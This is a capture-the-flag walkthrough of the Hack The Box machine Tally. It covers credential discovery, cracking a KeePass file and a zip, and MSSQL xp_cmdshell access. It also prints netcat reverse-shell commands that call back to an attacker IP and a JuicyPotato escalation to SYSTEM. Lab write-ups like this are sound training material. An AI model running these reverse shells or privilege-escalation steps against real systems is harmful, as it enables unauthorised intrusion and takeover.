HTB - Tally
Getting Root
We find some files on share-point which have credentials to the FTP server
From FTP we get a KeePass database file with credentials that allow us to get a zip file from smb and that file has credentials to the SQL server which allows us to get a shell using xp_cmdshell
The user sarah has the
SeImpersonatePrivilegewhich is easily exploitable using therotten potato/juicypotato
Tools Used:
nmap, dirsearch.py, keepass2john, zip2john, impacket-mssqlclient.py, impacket-smbserver, juicypotato
Nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-05 20:22 EDT
Nmap scan report for tally.htb (10.10.10.59)
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
|_http-server-header: Microsoft-IIS/10.0
| http-title: Home
|_Requested resource was http://tally.htb/_layouts/15/start.aspx#/default.aspx
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp open ccproxy-http?
1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-04-05T22:22:49
|_Not valid after: 2050-04-05T22:22:49
|_ssl-date: 2020-04-06T00:25:52+00:00; +56s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
15567/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
| Negotiate
|_ NTLM
| http-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
32843/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
32844/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after: 9999-01-01T00:00:00
|_ssl-date: 2020-04-06T00:25:51+00:00; +55s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
32846/tcp open storagecraft-image StorageCraft Image Manager
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open unknown
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 55s, deviation: 0s, median: 54s
| ms-sql-info:
| 10.10.10.59:1433:
| Version:
| name: Microsoft SQL Server 2016 RTM
| number: 13.00.1601.00
| Product: Microsoft SQL Server 2016
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-04-06T00:25:00
|_ start_date: 2020-04-05T22:22:09
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 131.20 seconds
Enumeration
HTTP - Port 80
Dirsearch.py
#python3 /opt/dirsearch/dirsearch.py -u http://tally.htb -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt -E
_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 1708
Error Log: /opt/dirsearch/logs/errors-20-04-05_23-09-45.log
Target: http://tally.htb
[23:16:08] 302 - 143B - /_layouts/viewedit.aspx -> /_layouts/15/viewedit.aspx
[23:16:08] 302 - 143B - /_layouts/viewlsts.aspx -> /_layouts/15/viewlsts.aspx
[23:16:08] 302 - 143B - /_layouts/versions.aspx -> /_layouts/15/versions.aspx Visiting /_layouts/viewlsts.aspx provides some interesting results.
Found Documents with Cred
The Documents folder had a file with FTP details
FTP details:
Password: UTDRSCH53c"$6hys
Checking under Site Pages, we noticed another file named Finance Team
Looking at the contents of the file, we notice the username ftp_user
FTP - Port 21
We can successfully login using ftp_user and the password we found earlier.
# ncftp -u ftp_user -p 'UTDRSCH53c"$6hys' 10.10.10.59
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Connecting to 10.10.10.59...
Microsoft FTP Service
Logging in...
User logged in.
Logged in to 10.10.10.59.
ncftp / > ls
From-Custodian/ Intranet/ Logs/ To-Upload/ User/
ncftp / >
Found KeePass File
Under /Users/Tim we find a keepass file named tim.kdbx
ncftp /User/Tim > cd Files/
ncftp /User/Tim/Files > ls
bonus.txt KeePass-2.36/ tim.kdbx Cracking the KeePass password
# keepass2john tim.kdbx > tim_hash
# sudo john --wordlist=/home/kali/HackTheBox/Tools/rockyou.txt tim_hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
simplementeyo (tim)
1g 0:00:00:11 DONE (2020-04-06 01:09) 0.08718g/s 2153p/s 2153c/s 2153C/s simplementeyo..sept17
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Username: Finance
Password: Acc0unting
SMB - Port 445
Checking the credentials using cme works and we also notice that we have read access to the ACCT share.
# crackmapexec smb 10.10.10.59 -u finance -p Acc0unting --shares
SMB 10.10.10.59 445 TALLY [*] Windows Server 2016 Standard 14393 x64 (name:TALLY) (domain:TALLY) (signing:False) (SMBv1:True)
SMB 10.10.10.59 445 TALLY [+] TALLY\finance:Acc0unting
SMB 10.10.10.59 445 TALLY [+] Enumerated shares
SMB 10.10.10.59 445 TALLY Share Permissions Remark
SMB 10.10.10.59 445 TALLY ----- ----------- ------
SMB 10.10.10.59 445 TALLY ACCT READ
SMB 10.10.10.59 445 TALLY ADMIN$ Remote Admin
SMB 10.10.10.59 445 TALLY C$ Default share
SMB 10.10.10.59 445 TALLY IPC$ Remote IPC
Found a zipfile
smb: \zz_Migration\Backup\20170808\orcharddb\> ls
. D 0 Sun Sep 3 10:23:16 2017
.. D 0 Sun Sep 3 10:23:16 2017
orcharddb.zip A 1012 Sun Sep 3 10:23:07 2017 Cracking the zipfile
# zip2john orcharddb.zip > orchard_hash
# john --wordlist=/home/kali/HackTheBox/Tools/rockyou.txt orchard_hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Acc0unting (orcharddb.zip/orcharddb.sql)
1g 0:00:00:00 DONE (2020-04-06 02:24) 1.010g/s 11551Kp/s 11551Kc/s 11551KC/s Aimeerose83..Abdouhabibi
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Unzipping the file orcharddb.zip shows an sql file with some creds.
([Id], [UserName], [Email], [NormalizedUserName], [Password], [PasswordFormat], [HashAlgorithm], [PasswordSalt], [RegistrationStatus], [EmailStatus], [EmailChallengeToken])
(2, N'admin', N'', N'admin', N'Finance2', N'Clear', N'SHA1', N's2Ieb5Pn7Vwf+X6JEXJitg==', N'Approved', N'Approved', NULL)Found tester.exe
smb: \zz_Migration\Binaries\New Folder\> ls
. D 0 Thu Sep 21 02:21:09 2017
.. D 0 Thu Sep 21 02:21:09 2017
crystal_reports_viewer_2016_sp04_51051980.zip A 389188014 Wed Sep 13 15:56:38 2017
Macabacus2016.exe A 18159024 Mon Sep 11 17:20:05 2017
Orchard.Web.1.7.3.zip A 21906356 Tue Aug 29 19:27:42 2017
putty.exe A 774200 Sun Sep 17 16:19:26 2017
RpprtSetup.exe A 483824 Fri Sep 15 15:49:46 2017
tableau-desktop-32bit-10-3-2.exe A 254599112 Mon Sep 11 17:13:14 2017
tester.exe A 215552 Fri Sep 1 07:15:54 2017
vcredist_x64.exe A 7194312 Wed Sep 13 16:06:28 2017
8387839 blocks of size 4096. 714594 blocks available
smb: \zz_Migration\Binaries\New Folder\> get tester.exe
getting file \zz_Migration\Binaries\New Folder\tester.exe of size 215552 as tester.exe (357.4 KiloBytes/sec) (average 357.4 KiloBytes/sec)
smb: \zz_Migration\Binaries\New Folder\>
# strings tester.exe
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G; Creds:
sa:GWE3V65#6KFH93@4GWTG2G
Exploitation:
python /opt/impacket/examples/mssqlclient.py sa:'GWE3V65#6KFH93@4GWTG2G'@10.10.10.59
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(TALLY): Line 1: Changed database context to 'master'.
[*] INFO(TALLY): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (130 665)
[!] Press help for extra shell commands
SQL>
Getting a shell
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
SQL> enable_xp_cmdshell
[*] INFO(TALLY): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(TALLY): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> enable_xp_cmdshell 1
[*] INFO(TALLY): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(TALLY): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE
SQL> xp_cmdshell whoami
output
--------------------------------------------------------------------------------
tally\sarah
Copy nc.exe to the box using impacket-smbserver
On my Kali Box
# impacket-smbserver share $(pwd)
On Tally
# SQL> xp_cmdshell net use p: \\10.10.14.55\share
# SQL> xp_cmdshell copy p:\nc.exe c:\temp
# SQL> xp_cmdshell c:\temp\nc.exe -e cmd.exe 10.10.14.55 9001
On my kali box, I get a shell
# rlwrap nc -lnvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.59.
Ncat: Connection from 10.10.10.59:49907.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Privilege Escalation
The user sarah has some privileges that can be abused using JuicyPotato
c:\TEMP>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
We copied the JuicyPotato to the target using the same method we used for nc.exe when executed, we didn't get a shell. However after trying different CLSID, we got a shell
CLSID that worked:
UsoSvc {E7299E79-75E5-47BB-A03D-6D319FB7F886} {B91D5831-B1BD-4608-8198-D72E155020F7}
http://ohpe.it/juicy-potato/CLSID/
c:\TEMP>.\jp.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe -e cmd.exe 10.10.14.55 9005" -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}"
.\jp.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe -e cmd.exe 10.10.14.55 9005" -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}"
Testing {7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381} 1337
......
[+] authresult 0
{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
c:\TEMP>
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9005
Ncat: Listening on 0.0.0.0:9005
Ncat: Connection from 10.10.10.59.
Ncat: Connection from 10.10.10.59:49979.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
Last updated
